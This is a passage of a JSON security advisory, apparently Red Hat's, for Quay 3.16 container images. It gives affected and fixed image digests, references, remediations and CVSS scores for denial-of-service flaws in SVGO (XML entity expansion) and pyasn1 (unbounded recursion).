            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445132"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application\u0027s failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "svgo: SVGO: Denial of Service via XML entity expansion",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445132",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
        },
        {
          "category": "external",
          "summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673",
          "url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
        }
      ],
      "release_date": "2026-03-06T07:23:05.716000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "svgo: SVGO: Denial of Service via XML entity expansion"
    },
    {
      "cve": "CVE-2026-30922",
      "cwe": {
        "id": "CWE-835",
        "name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
      },
      "discovery_date": "2026-03-18T04:02:45.401296+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2448553"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "pyasn1: pyasn1 Vulnerable to Denial of Service via Unbounded Recursion",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-30922"
        },
        {
          "category": "external",
          "summary": "RHBZ#2448553",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448553"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-30922",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-30922"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30922"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0",
          "url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r",
          "url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"
        }
      ],
      "release_date": "2026-03-18T02:29:45.857000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
